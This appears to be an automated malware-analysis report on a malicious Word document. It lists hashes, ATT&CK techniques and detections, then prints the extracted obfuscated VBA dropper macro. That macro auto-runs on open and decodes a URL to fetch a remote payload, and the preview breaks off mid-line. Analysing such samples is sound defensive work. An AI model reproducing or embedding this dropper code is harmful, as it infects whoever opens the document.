Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3248d42f773560a6…

MALICIOUS

Office (OLE)

Size: 104.0 KB
Created: 2016-05-31 22:31:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: d30217bc915d70b2495b31a51454f3cc
SHA-1: 8654dd931037897ca625c25da9e5f043d8876203
SHA-256: 3248d42f773560a6fc60a33339d1e5c70599585ce9937bf654157604dcf1009c
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an Office document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro utilizes CreateObject and CallByName, indicating it's designed to run arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' further supports its malicious nature as a dropper. The obfuscated VBA code strongly suggests it's intended to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Donoff-5743527-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call (high) OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs:
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19815 bytes
SHA-256: 2a8346f40036af636fc89bd101df120d4135cd41a2dd40861cba2a7a40f3c096
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub epJGWrVDyTB(ByVal QSGaEafv As String, ByVal Opzmn As Integer)
YDrtr True, "yeTrih8rs3csiQgxv8Fp77ao7VSxr", 9044
NWsIBief "Xwz0PICvru7cQTvIRj3d4", "jNu5QvcbuuyLLSr0KgGSpwi"
gbRldGybWWVadq
DzCvDuoDDX = 6741
If JLvtbWFBp("9Mk0EcZ4Yh1fAqbaX", 886, 440) Then
tgNXLidb = 9024
vMWgGfRhvotm
SnmudJWeMit 1883
wyZbwLPtmC = 3192
bFoveeOx "gN80pZE2nhtXRxTFMyPZwOJg"
GUKmAiVQabCBd = "VnXApT57vSkNBJbe6l28663lGwX"
Else
IehNuzMIjMAAPJ 653, 5024, 4694
dstGNHtPluXtI "LDXBdXGFAOwBzWj2mwpwBuLYB", 9258
owUftD
tdxjbFNHWiIn = False
End If
End Sub
Private Sub vzVkKI(ByVal bQzXoNUXwBmtOO As Integer)
xbWqd "Bz29aJ7NZbYNGegZ8h3S2JBPsb", "jYzMqCSU1uxgbd7ppf57JZFle", "A9JrcPw77wB8mnwPhaD5ubci1"
dmFpLzjeR = 358
XkWqYjImb
dcYhscmtXnJ = "YRWl1CE59TQmQReLi7QQULakg2bvl"
If gFIdyxM(True, 55, True) Then
ojqaDMl = 4069
AesGzyWlxJp 555, "0xkdwhhEJhM5nJT2x", 2131
BqXjITqzJYFobN = "1oaaj4d5O2NK7IbDAHg6e"
dwfqEjcCR
Else
szxfJdmqjH
xqEdEYl 9355
fkhRWncUUBHAD = "q7RP3WRTnufEt1Ac8paf5yCWLM"
End If
End Sub
Private Sub Document_Open()
Dim igHVxKXufXsXO As Integer
Dim mhFFtvxFrRwLPm As Boolean
GapfNL.uRiiQVqZV
End Sub

Attribute VB_Name = "GapfNL"
Private Sub gkvvfTPdSqSX(ByVal EzfhrARrt As String, ByVal artlBzr As String)
ebXztwddWF "1LTjREkhJUaKSQErKK8SUfRCQM"
WjKgZqsQWJEc = "g3Do9caFGW9DKiKBi"
kOFQVpWTVFVHJz "DloCNUsnMuXineIVoSaz0SCaxPE9OCW", "0KESsAsLqQjTAUL5pg59k5YZwHhJ", True
End Sub
Private Sub ITIPk(ByVal AGwXdWmeVIJw As Integer, ByVal ShpwZop As String)
PTHXmkZB 3110
veVvFoZTnn = 6371
QOQPDzLrv "lq7jYkNJ1ujuedV1S03w64xFuT", "ntcIODkZDbhznEtFXhg2Jy"
PKZCPvv = True
xkrJpjUXBTlLpW
End Sub
Private Sub GaCvpctNFOFyCl(ByVal naDTIem As String, ByVal tgiOHxnYV As Boolean)
pvzFf
zxQChqKsOGtGaV
fLbOSAujnh
End Sub
Public Function nYGzMCllQK(ByVal qvQcS As String, ByVal pjpVxyInHnqQH As String) As Object
Dim ftoNhmmDfr As Integer
Dim gpuKQIioACSCn As String
Set nYGzMCllQK = DDwovmDKECrJ(CreateObject(qvQcS))
End Function
Public Sub uRiiQVqZV()
Dim sHdMwNDxXjqdPH As String
Dim SpeZzKPlbrZ As Integer
On Error GoTo Kjkkrk
VowGcTWuifmiOW.iybyWiOTcZ
VowGcTWuifmiOW.QFbEYL
jsgKbBNvZD
Exit Sub
Kjkkrk:
End Sub
Private Sub OKsFsDPg(ByVal PBQmrkOTuW As String)
hixmeDkkqwaFk = "DdSBvnZFv7fu1At8s"
If ADOPV Then
dIGeyCnULFM False, "1DX6vhUUoDl1MQG5EteG"
pRrXYv
fydHBNMFROoRC True
Else
kJqGmTBVPNa 2123
End If
FrsbWgCy "qvYrfz0j3wuW4LroT5NsIZYe7sECm", 972
End Sub
Private Function DDwovmDKECrJ(ByVal ZBFRRddu As Object) As Object
Dim uBVhZqxc As Integer
Set DDwovmDKECrJ = ZBFRRddu
End Function
Private Sub aRgRYrAlXyw(ByVal DpeWnyt As String, ByVal vpdNm As String, ByVal wUzQXDibsm As String)
Set HDlTjvnvSxpIk = IjHPBFHSuduNmQ.qgOQwcBN(True, wUzQXDibsm)
IjHPBFHSuduNmQ.JQhQLLb OYfIcwvfuBIK, 2670, "nGsMllSEBDjvT19LFGtw40b", HDlTjvnvSxpIk
fIIvqJDCRrklu.FTOGRItoOT ZzHrrJDZaCkKE.ZGhRXPCowqRD(KhsGGIcFYWEzx, HDlTjvnvSxpIk, 8879), False, "j9DNGWLSDMKsPzFCee6Uvm48TOl4", DpeWnyt
End Sub
Private Sub jsgKbBNvZD()
Dim uBiDmyERxKkLGs As Boolean
aRgRYrAlXyw fIIvqJDCRrklu.QMehdJSjK, "W89SE8d4WGI4y3kRw", wXfhZLx
fIIvqJDCRrklu.TvbBkXFDqu False, 618, fIIvqJDCRrklu.QMehdJSjK
End Sub
Private Function OYfIcwvfuBIK() As String
OYfIcwvfuBIK = CBoRIUgKyYNZh.QKgpgOuYaZui("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function KhsGGIcFYWEzx() As String
KhsGGIcFYWEzx = CBoRIUgKyYNZh.QKgpgOuYaZui("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function wXfhZLx() As String
wXfhZLx = CBoRIUgKyYNZh.QKgpgOuYaZui("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "CBoRIUgKyYNZh"
Private Function bdbWCHX(ByVal FAzFKR As Integer, ByVal NRcIUIWVOTKiA As Integer, ByVal GjddEQZWEAGQ As String, B
... (truncated)